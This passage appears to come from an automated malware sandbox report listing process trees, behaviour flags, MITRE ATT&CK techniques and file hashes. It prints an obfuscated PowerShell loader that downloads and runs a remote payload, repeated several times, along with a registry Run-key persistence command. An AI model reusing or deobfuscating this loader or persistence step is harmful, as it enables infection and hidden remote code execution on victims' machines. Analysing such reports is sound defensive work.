G nlProtoArchsLap.PTrani KryN .ubAQuinL N n=Sori$ PuleRys,N Pl.vAcro: UndA traPbutiPEfteDS.akABranTM rsaHola+ ubb$Th rFTherO corr Q.iSG nktRev.V QuaSP ofn .neeDictT SmasB tr ');Mactation (Retshjlp 'Na.o$ lacG InflLev.oForbBMa.taWisdL For:D ssjS,lleIntrRD monBispbskalaAdvonArveeE ceGAbsuA Trad.rugEIndd=M.no$S edi l sNFjerDMoraeSt bsPlatN Loue OmleNonrNOchlDEpipE N n.RgtoSdacrPCynal SupiTw.ft Dod(Cadd$ SubR pakeVebgvJa aO C mkAsteE upeR Funsfris) Dow ');Mactation (Retshjlp $Amtstue);$Indesneende=$Jernbanegade[0];$Glutenin=(Retshjlp ' ese$.okagMur,LKlagoAf iB VeraPurllUret:AnskbBirkRTruni StrKbrygEPunkTudfrTNon ePandrho oIVespnValgG IndEKohrrregrS R,d= Obsn.ulsENon,wFind- NulOKickBFradJ P eeDiskCPat T am SnegsChroYAhuiS yttTaraECic M Vit. olsnFrede FirTGura.Trekw ChieMicrBStemc proLDeceIAab eAgelnW enTFami ');Mactation ($Glutenin);Mactation (Retshjlp 'Prol$Lir B Bagr Skui M dk .bees.lvtupgit rykeSt prDu ai AmpnIn eg Po.eq irr,raisudd..Bl,dH elteO.ela DeldUnpeeOrdir,elesFjan[ind,$DataS ScypCodieS.atgVense P csRneskForniNonun MalkTilre Re nOv r]Buis=F ct$ assSTopmwResoeopusa Bret tenbDervoluthxDrmmeFnd swede ');$Encephalocoele=Retshjlp ' ing$hostB S lrH,uliFrankJoshe nontBun tMonoe L nr VigiEldonYan.gSu ueOss rArb.s ven.FuniD B.loOve,wnormn PomlResso Veja PaadSpirFPra,iMy olNatieHipp( Qu $,irkIUnsanHelpdGrudeTorssNon nJoshe ejee Sdmn UnhdBruse Tvi,Morg$PumpS.iapcPr fuDy ptUdbueIggylEgyplMis aselvr AntiBisma Te ) Le ';$Scutellaria=$Oculospinal;Mactation (Retshjlp 'Stos$ estG H dlSalaO R tbHundaKandlBran:AutoDrtesEIrreTMitio KonnAu ie Af,rAppei esknSandg BiseTrinROve,n G ne BekSNaph=Pens(AkadTKolleScriS OuttHum -s gaPMatuA Yajt StyHRull Stea$AgousMi,iCAnodU epeT eaE S.kL ResLMisnACorpRfilmi,edka pe)Caec ');while (!$Detoneringernes) {Mactation (Retshjlp 'Sub $RigogSti lKnaroDerobCharaGamblTran:IstnUTilgd Hyls .yskT,rar Bili icegStn eTordnUnexeHjaesMask=Helt$R vitMonorKa duT uneKnst ') ;Mactation $Encephalocoele;Mactation (Retshjlp 'Ch rsMisttKommaFejdR RapTLexi- ForsMenulToupeStorEGi.pPDevi Trom4Laag ');Mactation (Retshjlp 'Con $ NetgTykmLI teoViftBSpytaskumlfinm:LaluDVejre,ootT ontoSal nOocyECo.lr ,iri Tunn ,ddg KlgePagur Heln PileKrseSPrak=Unex(insitSkane nthS actTPron-Rushp esta Pe T ManHEpim Hell$ An sImmuCFaciURelutNonbEUnciLspagLsv maSlofRUn.ei Crua nao) orh ') ;Mactation (Retshjlp ' gla$ ChoG Scrl,pvaO D,sBSa aAGrssL nd:trasaFortF tteS,rutA ,elt Unts RuseunstRTene3Ki.b=Shem$S.esGExt.lSomroGangBToucaGratLFejl:g.elUAkvdlFlanI DreDFre,ETyk l NoniA itgQuisEEjersferi+pole+ ang% Re.$.arnJLagrEacrorVernnju,bB Ki aUdvln odEBooggBarbaSeriDLi le ash.SpejC stroInlaUTegnNac,ttTwan ') ;$Indesneende=$Jernbanegade[$Afsatser3];}$Posttrial=317102;$Gengangerenes=30347;Mactation (Retshjlp 'sce $Af,aGTreslbr.eOSkraBSiksAStoflSem :JipiBSeyci udgD eae,ambreffeE l enNeocSL.ge Cabr=Spha AmmoGF stE Bo,tFlu -LrdsCUnicoFe lNsemitfrarEMyxonSulatMini R fi$Jea.sDemoC DigUS.mitS nhELagrlacerlSkolaFeltr Lo.IFul.a Non ');Mactation (Retshjlp 'Kuv,$ FesgF rgl,ecuoDevebD.ipaKamel.edu: MasKhi eoNak oabl.l fogodiplk .keaRestmCorpbDrooaDet xas=konf C,st[ anaSMi.eyLy.as DistGadeeReprmchao. AalC Ekso BednS dev.onteJuxtr ilbtUnev]bovl:.end:ArchFT.ltrGo soFo lmU taB Kl aW amsFraneId n6boni4E kaSR sttAstrrsenni loonRampg Ege(Ma i$RatiBEmi iCompd.leve RecrstraeMornn Va.sLib.)Shiv ');Mactation (Retshjlp 'Thim$beskGSingL MycoShocb IndaBiotlMu t:PrehDdip.EFrenmJammitranMHub OHyponHamudUngrE NonR SkunForeelnensArak1 T l1Exit5Schi Phil= Fed Mona[Unc sForhyDepus PhyTGuhaeHistmRejn.hym tUnsaeJunkxBorgtUngd.NoseEHeminDrifc lucoSp iDToakiunlin U iGDuft] lte:euph:HerpAGaars SniCFinaIStndiFlo..SemiGTranekoret.nfoSInddtB roRBajoiHa tN twaGBrne(Sher$DiscKAkt oudg OFasclBundOMaxiKMaskaSpirmKontBO.erabgeh)Assu ');Mactation (Retshjlp 'Bioc$LeonGSkivlBaldO ailbobduaant.LS en:BotaAbuttRT,llB,erbEEns JGrejdEm.rS F,rGMasqAStyrnDuppGBor,sNaa =Coro$ mpodShiiEmousMProtIBe omDasho SubN.ukcdfamiePostrdinenc tieAd aS Vi 1grot1Hank5Imdt.EndesBehaU GauBRi.sS esT.affr L.iI mbNUdsegBagt(S.ed$Ind pEutoObronsPostTSpigtNetvRDisriMortaOve,L Hen,Calo$Fla,gFjlleKantnskntGDe oATig nStamgBl nE JenrbesvEom iN eseLysaSStal)Vowe ');Mactation $Arbejdsgangs;"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3556
-
-
-
-
-
C:\Users\Admin\AppData\Local\Apps\2.0\LM26HD1C.680\TJ9JBCGV.7R7\scre..tion_25b0fbb6ef7eb094_0018.0003_743ff44d8ef80381\ScreenConnect.WindowsClient.exe"C:\Users\Admin\AppData\Local\Apps\2.0\LM26HD1C.680\TJ9JBCGV.7R7\scre..tion_25b0fbb6ef7eb094_0018.0003_743ff44d8ef80381\ScreenConnect.WindowsClient.exe" "RunRole" "67228d21-3b86-486a-ae8b-15e93d7ca6e2" "System"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:3392
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Energiministerierne Prfabrikaqr Inkhorn Regionsplanretningsliniernes Enchymatous #>;$Atomubaaden='Osculiferous';<#Sublittoral Actual Fodgngergades #>; function Retshjlp($Courtliest){If ($host.DebuggerEnabled) {$Kinsmen++;}$Faserummets=$Procentangivelserne+$Courtliest.'Length'-$Kinsmen; for ( $myopy=4;$myopy -lt $Faserummets;$myopy+=5){$Hovedkammerslags184=$myopy;$Unsimmered+=$Courtliest[$myopy];}$Unsimmered;}function Mactation($Unchaotically){ & ($Internation) ($Unchaotically);}$Sweatboxes=Retshjlp 'Ga lML gdoRe ezJordi BuelVaanlN fiaVroe/Cont ';$Underleverandrerne=Retshjlp ' ModTst.il,uffs Udr1Unte2Guld ';$Amtstue='bera[ etrNDewdESpertKol . lyS snuEFremRAnoeV ereI VraCSequeVel,PFlyvoCrieIDes NHam TF emMKorta LignGe.eAEndeGElvrETidsrP ec]Ak,e:rske:Sto.SV rmepreoCIsthUK beRBaaniM,dutIn iyS riP PonRUnveo isaT F aOIn oCDrawo,alelEkst=rand$Dep ulibenUak DDomme Equrtresl ,ocEtempvLepte Ud.rSmu,A OranRegnDKvatR UdseSaucrCa,yn C reBr e ';$Sweatboxes+=Retshjlp ' Rim5 ont.Nobb0Stat Pru,(Tes.WEc.liImpunSammdRettoGonawInitsCora HypeN SjkTU.lu Tusc1 Res0 All.Ta.e0She,;Slid SkatW IdeiHvidn Dep6Fra 4Sove; Asy ZinkxStom6Mono4baca;Trif EndrTri vTerb: Bvl1Uval3 Lat1Shau.ajou0 Tak)Res, U,deGimm,eByggc Wedk.iskoTing/Serp2 ove0Retu1Appl0Orei0nude1Pach0Un,i1F or Sym,FL mbiBlenr U aeCombfgrunouopsxMisy/Tjrn1inse3trak1Ra k.Tang0,ekl ';$Spegeskinken=Retshjlp ' EmoUTyndShosteRetlrcyk -IltoAPentGnimaE ,laNRe.iteg t ';$Indesneende=Retshjlp ' Waih P rtBu ntBl.npTo lsdist:C ra/ S o/ FedfMi diSelvlSikkeRer doutpnGaye. BeneBes uHalv/FistlSour9WeektforsE oltws imb No 9.edvsEnd,6UnmoaUnogaSin RO,tawCast5BaglfnegeyBageUHeckiPenaarenaCAllu0OmkllD,cofCam /TrilBAc er.efrn.oree S nsBorrd K,te ih sKnop. resrCha,aBorirreli ';$Revokers=Retshjlp 'Info>Af u ';$Internation=Retshjlp 'AutoI teeJurixSupe ';$Sublimeringen='Exanimated';$Forstvsnets='\Adressefelternes.Fre';Mactation (Retshjlp 'Spor$ScougB.grLBostOPleiBIndeapresl.upp:SyklOSca CS ruu G nlProtoArchsLap.PTrani KryN .ubAQuinL N n=Sori$ PuleRys,N Pl.vAcro: UndA traPbutiPEfteDS.akABranTM rsaHola+ ubb$Th rFTherO corr Q.iSG nktRev.V QuaSP ofn .neeDictT SmasB tr ');Mactation (Retshjlp 'Na.o$ lacG InflLev.oForbBMa.taWisdL For:D ssjS,lleIntrRD monBispbskalaAdvonArveeE ceGAbsuA Trad.rugEIndd=M.no$S edi l sNFjerDMoraeSt bsPlatN Loue OmleNonrNOchlDEpipE N n.RgtoSdacrPCynal SupiTw.ft Dod(Cadd$ SubR pakeVebgvJa aO C mkAsteE upeR Funsfris) Dow ');Mactation (Retshjlp $Amtstue);$Indesneende=$Jernbanegade[0];$Glutenin=(Retshjlp ' ese$.okagMur,LKlagoAf iB VeraPurllUret:AnskbBirkRTruni StrKbrygEPunkTudfrTNon ePandrho oIVespnValgG IndEKohrrregrS R,d= Obsn.ulsENon,wFind- NulOKickBFradJ P eeDiskCPat T am SnegsChroYAhuiS yttTaraECic M Vit. olsnFrede FirTGura.Trekw ChieMicrBStemc proLDeceIAab eAgelnW enTFami ');Mactation ($Glutenin);Mactation (Retshjlp 'Prol$Lir B Bagr Skui M dk .bees.lvtupgit rykeSt prDu ai AmpnIn eg Po.eq irr,raisudd..Bl,dH elteO.ela DeldUnpeeOrdir,elesFjan[ind,$DataS ScypCodieS.atgVense P csRneskForniNonun MalkTilre Re nOv r]Buis=F ct$ assSTopmwResoeopusa Bret tenbDervoluthxDrmmeFnd swede ');$Encephalocoele=Retshjlp ' ing$hostB S lrH,uliFrankJoshe nontBun tMonoe L nr VigiEldonYan.gSu ueOss rArb.s ven.FuniD B.loOve,wnormn PomlResso Veja PaadSpirFPra,iMy olNatieHipp( Qu $,irkIUnsanHelpdGrudeTorssNon nJoshe ejee Sdmn UnhdBruse Tvi,Morg$PumpS.iapcPr fuDy ptUdbueIggylEgyplMis aselvr AntiBisma Te ) Le ';$Scutellaria=$Oculospinal;Mactation (Retshjlp 'Stos$ estG H dlSalaO R tbHundaKandlBran:AutoDrtesEIrreTMitio KonnAu ie Af,rAppei esknSandg BiseTrinROve,n G ne BekSNaph=Pens(AkadTKolleScriS OuttHum -s gaPMatuA Yajt StyHRull Stea$AgousMi,iCAnodU epeT eaE S.kL ResLMisnACorpRfilmi,edka pe)Caec ');while (!$Detoneringernes) {Mactation (Retshjlp 'Sub $RigogSti lKnaroDerobCharaGamblTran:IstnUTilgd Hyls .yskT,rar Bili icegStn eTordnUnexeHjaesMask=Helt$R vitMonorKa duT uneKnst ') ;Mactation $Encephalocoele;Mactation (Retshjlp 'Ch rsMisttKommaFejdR RapTLexi- ForsMenulToupeStorEGi.pPDevi Trom4Laag ');Mactation (Retshjlp 'Con $ NetgTykmLI teoViftBSpytaskumlfinm:LaluDVejre,ootT ontoSal nOocyECo.lr ,iri Tunn ,ddg KlgePagur Heln PileKrseSPrak=Unex(insitSkane nthS actTPron-Rushp esta Pe T ManHEpim Hell$ An sImmuCFaciURelutNonbEUnciLspagLsv maSlofRUn.ei Crua nao) orh ') ;Mactation (Retshjlp ' gla$ ChoG Scrl,pvaO D,sBSa aAGrssL nd:trasaFortF tteS,rutA ,elt Unts RuseunstRTene3Ki.b=Shem$S.esGExt.lSomroGangBToucaGratLFejl:g.elUAkvdlFlanI DreDFre,ETyk l NoniA itgQuisEEjersferi+pole+ ang% Re.$.arnJLagrEacrorVernnju,bB Ki aUdvln odEBooggBarbaSeriDLi le ash.SpejC stroInlaUTegnNac,ttTwan ') ;$Indesneende=$Jernbanegade[$Afsatser3];}$Posttrial=317102;$Gengangerenes=30347;Mactation (Retshjlp 'sce $Af,aGTreslbr.eOSkraBSiksAStoflSem :JipiBSeyci udgD eae,ambreffeE l enNeocSL.ge Cabr=Spha AmmoGF stE Bo,tFlu -LrdsCUnicoFe lNsemitfrarEMyxonSulatMini R fi$Jea.sDemoC DigUS.mitS nhELagrlacerlSkolaFeltr Lo.IFul.a Non ');Mactation (Retshjlp 'Kuv,$ FesgF rgl,ecuoDevebD.ipaKamel.edu: MasKhi eoNak oabl.l fogodiplk .keaRestmCorpbDrooaDet xas=konf C,st[ anaSMi.eyLy.as DistGadeeReprmchao. AalC Ekso BednS dev.onteJuxtr ilbtUnev]bovl:.end:ArchFT.ltrGo soFo lmU taB Kl aW amsFraneId n6boni4E kaSR sttAstrrsenni loonRampg Ege(Ma i$RatiBEmi iCompd.leve RecrstraeMornn Va.sLib.)Shiv ');Mactation (Retshjlp 'Thim$beskGSingL MycoShocb IndaBiotlMu t:PrehDdip.EFrenmJammitranMHub OHyponHamudUngrE NonR SkunForeelnensArak1 T l1Exit5Schi Phil= Fed Mona[Unc sForhyDepus PhyTGuhaeHistmRejn.hym tUnsaeJunkxBorgtUngd.NoseEHeminDrifc lucoSp iDToakiunlin U iGDuft] lte:euph:HerpAGaars SniCFinaIStndiFlo..SemiGTranekoret.nfoSInddtB roRBajoiHa tN twaGBrne(Sher$DiscKAkt oudg OFasclBundOMaxiKMaskaSpirmKontBO.erabgeh)Assu ');Mactation (Retshjlp 'Bioc$LeonGSkivlBaldO ailbobduaant.LS en:BotaAbuttRT,llB,erbEEns JGrejdEm.rS F,rGMasqAStyrnDuppGBor,sNaa =Coro$ mpodShiiEmousMProtIBe omDasho SubN.ukcdfamiePostrdinenc tieAd aS Vi 1grot1Hank5Imdt.EndesBehaU GauBRi.sS esT.affr L.iI mbNUdsegBagt(S.ed$Ind pEutoObronsPostTSpigtNetvRDisriMortaOve,L Hen,Calo$Fla,gFjlleKantnskntGDe oATig nStamgBl nE JenrbesvEom iN eseLysaSStal)Vowe ');Mactation $Arbejdsgangs;"1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:5924 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5296 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nonletters" /t REG_EXPAND_SZ /d "%Rewithdrawal% -windowstyle 1 $Kammesjukkernes=(gp -Path 'HKCU:\Software\Parahypnosis\').Defoil;%Rewithdrawal% ($Kammesjukkernes)"3⤵
- System Location Discovery: System Language Discovery
PID:4644 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nonletters" /t REG_EXPAND_SZ /d "%Rewithdrawal% -windowstyle 1 $Kammesjukkernes=(gp -Path 'HKCU:\Software\Parahypnosis\').Defoil;%Rewithdrawal% ($Kammesjukkernes)"4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5548
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4888 -ip 48881⤵PID:5416
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Energiministerierne Prfabrikaqr Inkhorn Regionsplanretningsliniernes Enchymatous #>;$Atomubaaden='Osculiferous';<#Sublittoral Actual Fodgngergades #>; function Retshjlp($Courtliest){If ($host.DebuggerEnabled) {$Kinsmen++;}$Faserummets=$Procentangivelserne+$Courtliest.'Length'-$Kinsmen; for ( $myopy=4;$myopy -lt $Faserummets;$myopy+=5){$Hovedkammerslags184=$myopy;$Unsimmered+=$Courtliest[$myopy];}$Unsimmered;}function Mactation($Unchaotically){ & ($Internation) ($Unchaotically);}$Sweatboxes=Retshjlp 'Ga lML gdoRe ezJordi BuelVaanlN fiaVroe/Cont ';$Underleverandrerne=Retshjlp ' ModTst.il,uffs Udr1Unte2Guld ';$Amtstue='bera[ etrNDewdESpertKol . lyS snuEFremRAnoeV ereI VraCSequeVel,PFlyvoCrieIDes NHam TF emMKorta LignGe.eAEndeGElvrETidsrP ec]Ak,e:rske:Sto.SV rmepreoCIsthUK beRBaaniM,dutIn iyS riP PonRUnveo isaT F aOIn oCDrawo,alelEkst=rand$Dep ulibenUak DDomme Equrtresl ,ocEtempvLepte Ud.rSmu,A OranRegnDKvatR UdseSaucrCa,yn C reBr e ';$Sweatboxes+=Retshjlp ' Rim5 ont.Nobb0Stat Pru,(Tes.WEc.liImpunSammdRettoGonawInitsCora HypeN SjkTU.lu Tusc1 Res0 All.Ta.e0She,;Slid SkatW IdeiHvidn Dep6Fra 4Sove; Asy ZinkxStom6Mono4baca;Trif EndrTri vTerb: Bvl1Uval3 Lat1Shau.ajou0 Tak)Res, U,deGimm,eByggc Wedk.iskoTing/Serp2 ove0Retu1Appl0Orei0nude1Pach0Un,i1F or Sym,FL mbiBlenr U aeCombfgrunouopsxMisy/Tjrn1inse3trak1Ra k.Tang0,ekl ';$Spegeskinken=Retshjlp ' EmoUTyndShosteRetlrcyk -IltoAPentGnimaE ,laNRe.iteg t ';$Indesneende=Retshjlp ' Waih P rtBu ntBl.npTo lsdist:C ra/ S o/ FedfMi diSelvlSikkeRer doutpnGaye. BeneBes uHalv/FistlSour9WeektforsE oltws imb No 9.edvsEnd,6UnmoaUnogaSin RO,tawCast5BaglfnegeyBageUHeckiPenaarenaCAllu0OmkllD,cofCam /TrilBAc er.efrn.oree S nsBorrd K,te ih sKnop. resrCha,aBorirreli ';$Revokers=Retshjlp 'Info>Af u ';$Internation=Retshjlp 'AutoI teeJurixSupe ';$Sublimeringen='Exanimated';$Forstvsnets='\Adressefelternes.Fre';Mactation (Retshjlp 'Spor$ScougB.grLBostOPleiBIndeapresl.upp:SyklOSca CS ruu G nlProtoArchsLap.PTrani KryN .ubAQuinL N n=Sori$ PuleRys,N Pl.vAcro: UndA traPbutiPEfteDS.akABranTM rsaHola+ ubb$Th rFTherO corr Q.iSG nktRev.V QuaSP ofn .neeDictT SmasB tr ');Mactation (Retshjlp 'Na.o$ lacG InflLev.oForbBMa.taWisdL For:D ssjS,lleIntrRD monBispbskalaAdvonArveeE ceGAbsuA Trad.rugEIndd=M.no$S edi l sNFjerDMoraeSt bsPlatN Loue OmleNonrNOchlDEpipE N n.RgtoSdacrPCynal SupiTw.ft Dod(Cadd$ SubR pakeVebgvJa aO C mkAsteE upeR Funsfris) Dow ');Mactation (Retshjlp $Amtstue);$Indesneende=$Jernbanegade[0];$Glutenin=(Retshjlp ' ese$.okagMur,LKlagoAf iB VeraPurllUret:AnskbBirkRTruni StrKbrygEPunkTudfrTNon ePandrho oIVespnValgG IndEKohrrregrS R,d= Obsn.ulsENon,wFind- NulOKickBFradJ P eeDiskCPat T am SnegsChroYAhuiS yttTaraECic M Vit. olsnFrede FirTGura.Trekw ChieMicrBStemc proLDeceIAab eAgelnW enTFami ');Mactation ($Glutenin);Mactation (Retshjlp 'Prol$Lir B Bagr Skui M dk .bees.lvtupgit rykeSt prDu ai AmpnIn eg Po.eq irr,raisudd..Bl,dH elteO.ela DeldUnpeeOrdir,elesFjan[ind,$DataS ScypCodieS.atgVense P csRneskForniNonun MalkTilre Re nOv r]Buis=F ct$ assSTopmwResoeopusa Bret tenbDervoluthxDrmmeFnd swede ');$Encephalocoele=Retshjlp ' ing$hostB S lrH,uliFrankJoshe nontBun tMonoe L nr VigiEldonYan.gSu ueOss rArb.s ven.FuniD B.loOve,wnormn PomlResso Veja PaadSpirFPra,iMy olNatieHipp( Qu $,irkIUnsanHelpdGrudeTorssNon nJoshe ejee Sdmn UnhdBruse Tvi,Morg$PumpS.iapcPr fuDy ptUdbueIggylEgyplMis aselvr AntiBisma Te ) Le ';$Scutellaria=$Oculospinal;Mactation (Retshjlp 'Stos$ estG H dlSalaO R tbHundaKandlBran:AutoDrtesEIrreTMitio KonnAu ie Af,rAppei esknSandg BiseTrinROve,n G ne BekSNaph=Pens(AkadTKolleScriS OuttHum -s gaPMatuA Yajt StyHRull Stea$AgousMi,iCAnodU epeT eaE S.kL ResLMisnACorpRfilmi,edka pe)Caec ');while (!$Detoneringernes) {Mactation (Retshjlp 'Sub $RigogSti lKnaroDerobCharaGamblTran:IstnUTilgd Hyls .yskT,rar Bili icegStn eTordnUnexeHjaesMask=Helt$R vitMonorKa duT uneKnst ') ;Mactation $Encephalocoele;Mactation (Retshjlp 'Ch rsMisttKommaFejdR RapTLexi- ForsMenulToupeStorEGi.pPDevi Trom4Laag ');Mactation (Retshjlp 'Con $ NetgTykmLI teoViftBSpytaskumlfinm:LaluDVejre,ootT ontoSal nOocyECo.lr ,iri Tunn ,ddg KlgePagur Heln PileKrseSPrak=Unex(insitSkane nthS actTPron-Rushp esta Pe T ManHEpim Hell$ An sImmuCFaciURelutNonbEUnciLspagLsv maSlofRUn.ei Crua nao) orh ') ;Mactation (Retshjlp ' gla$ ChoG Scrl,pvaO D,sBSa aAGrssL nd:trasaFortF tteS,rutA ,elt Unts RuseunstRTene3Ki.b=Shem$S.esGExt.lSomroGangBToucaGratLFejl:g.elUAkvdlFlanI DreDFre,ETyk l NoniA itgQuisEEjersferi+pole+ ang% Re.$.arnJLagrEacrorVernnju,bB Ki aUdvln odEBooggBarbaSeriDLi le ash.SpejC stroInlaUTegnNac,ttTwan ') ;$Indesneende=$Jernbanegade[$Afsatser3];}$Posttrial=317102;$Gengangerenes=30347;Mactation (Retshjlp 'sce $Af,aGTreslbr.eOSkraBSiksAStoflSem :JipiBSeyci udgD eae,ambreffeE l enNeocSL.ge Cabr=Spha AmmoGF stE Bo,tFlu -LrdsCUnicoFe lNsemitfrarEMyxonSulatMini R fi$Jea.sDemoC DigUS.mitS nhELagrlacerlSkolaFeltr Lo.IFul.a Non ');Mactation (Retshjlp 'Kuv,$ FesgF rgl,ecuoDevebD.ipaKamel.edu: MasKhi eoNak oabl.l fogodiplk .keaRestmCorpbDrooaDet xas=konf C,st[ anaSMi.eyLy.as DistGadeeReprmchao. AalC Ekso BednS dev.onteJuxtr ilbtUnev]bovl:.end:ArchFT.ltrGo soFo lmU taB Kl aW amsFraneId n6boni4E kaSR sttAstrrsenni loonRampg Ege(Ma i$RatiBEmi iCompd.leve RecrstraeMornn Va.sLib.)Shiv ');Mactation (Retshjlp 'Thim$beskGSingL MycoShocb IndaBiotlMu t:PrehDdip.EFrenmJammitranMHub OHyponHamudUngrE NonR SkunForeelnensArak1 T l1Exit5Schi Phil= Fed Mona[Unc sForhyDepus PhyTGuhaeHistmRejn.hym tUnsaeJunkxBorgtUngd.NoseEHeminDrifc lucoSp iDToakiunlin U iGDuft] lte:euph:HerpAGaars SniCFinaIStndiFlo..SemiGTranekoret.nfoSInddtB roRBajoiHa tN twaGBrne(Sher$DiscKAkt oudg OFasclBundOMaxiKMaskaSpirmKontBO.erabgeh)Assu ');Mactation (Retshjlp 'Bioc$LeonGSkivlBaldO ailbobduaant.LS en:BotaAbuttRT,llB,erbEEns JGrejdEm.rS F,rGMasqAStyrnDuppGBor,sNaa =Coro$ mpodShiiEmousMProtIBe omDasho SubN.ukcdfamiePostrdinenc tieAd aS Vi 1grot1Hank5Imdt.EndesBehaU GauBRi.sS esT.affr L.iI mbNUdsegBagt(S.ed$Ind pEutoObronsPostTSpigtNetvRDisriMortaOve,L Hen,Calo$Fla,gFjlleKantnskntGDe oATig nStamgBl nE JenrbesvEom iN eseLysaSStal)Vowe ');Mactation $Arbejdsgangs;"1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:5600 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3188
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Defense Evasion
Modify Registry
4Subvert Trust Controls
2Install Root Certificate
1SIP and Trust Provider Hijacking
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_BE4413523710330F97BEE5D4A544C42B
Filesize727B
MD54fa3d43839649fa226247eacc8a14a63
SHA1e555f58bd8b11622d96e0dbd0879f5eca30989ae
SHA256546fcbb9142dc00862a74ceb1fee9e91240f414e68b36b27ef2e3a8164964a30
SHA5122f65d0d98e6f5606d3c8e83ca1f264549aae0b91ae7ac4ad4b37f10314ad1be1fce5366bffdcfc7eec84538effd5fa246b50a5157c1272b31b2460fa0b114eac
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
Filesize727B
MD5f0339c0506fe0b51215f7227b14e656f
SHA1cf937eeed1483e23e81244baa03d5e8f112c56d5
SHA25647bf8749c1ac54c6586d625c99219f03c6a073f3b3f5689444985aae85a3e5b1
SHA512afb55465411bce78b7453e17aca382e0add24a1b0dd7f116cb077a2641abcbde8684e076d69ca6a3a61a3e47d156f85c80621082ab1a80f4a5b3b1b75f20d5bc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_BE4413523710330F97BEE5D4A544C42B
Filesize404B
MD5a4965e85e036c03bcb5b79194d84da83
SHA1623bd57e8f60e459b806c75404cc12fd82344d7e
SHA256f67a9147be70c5457511d4cc3d0cb2ad29e413c516876b511a147ddf680e2205
SHA5125506223cfed59f3089e7af45e77616970f1902011a422e0edacb421ef0cdf80f12249eb520c8d4df7dcb15c1818cd026859adf48a5f8e2d33ce19896968385b9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
Filesize412B
MD5ae382d9328ee9ca104360ffdff40e293
SHA11ce4c295ef340b53b0159a79af91bf21ac782044
SHA25674dfe2f7759d4b8f19ad1e387dfa529d15da374635ec5f7b002c6c9ed9062965
SHA512c68ec7a5cfbada5a6834d337b64f84e57e152ed27c6d00721fa37e0c60734677a18f29d9b353b58a66eada749a76edeb4499f6da794d34c7cec6ec93a467a190
-
C:\Users\Admin\AppData\Local\Apps\2.0\LM26HD1C.680\TJ9JBCGV.7R7\manifests\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97ef996e4275975b.cdf-ms
Filesize24KB
MD513e2694f30feba7a15d8e6e71e0d9fd1
SHA1ae87cf7f5d9044ea937d86eeac2bd2f6ed5a1b46
SHA2562807b8710c50ebe15cf3f5b45788a9357d615569eddf3d161166cc7da1880839
SHA5120294a78aaba8c36240387a7afe4053120cd75b5c97c2966b9fe4f71d00a27ca9b6e4aef57acd0b5d811a47186d68a43cc99a279bd7f4595e85b3d7b2a8ffeee8
-
C:\Users\Admin\AppData\Local\Apps\2.0\LM26HD1C.680\TJ9JBCGV.7R7\manifests\scre..core_4b14c015c87c1ad8_0018.0003_none_5358faf9fe4098cf.cdf-ms
Filesize3KB
MD5828ad1b15ca02522939356a4b6c10a38
SHA16af66138d70b6ac69ddad70e2181139e1948a020
SHA256ac46de69028b5bed1af6ebf2854a52271544f559b16f1b2c9eca72ea22d449b4
SHA5121c9136eeed4243f0c3a8a5eb47eb962e3bf4086b31f7b1eff4c86dc611c10e55a3ade0c5aa0688f68cb2e0a9ec1964ca9813f73974821aa73e36a70bd3bccf77
-
C:\Users\Admin\AppData\Local\Apps\2.0\LM26HD1C.680\TJ9JBCGV.7R7\manifests\scre..dows_4b14c015c87c1ad8_0018.0003_none_57d0d2db3a8eabff.cdf-ms
Filesize5KB
MD53f706cc8985abb449180e60c0eb0dfaa
SHA1bfe2c7075128b35f798cff9eabcc9482993048ae
SHA256dc0b00c4f59f740ea00cff311a83a4b7bdcf337d4b04436bc267df223f994d6f
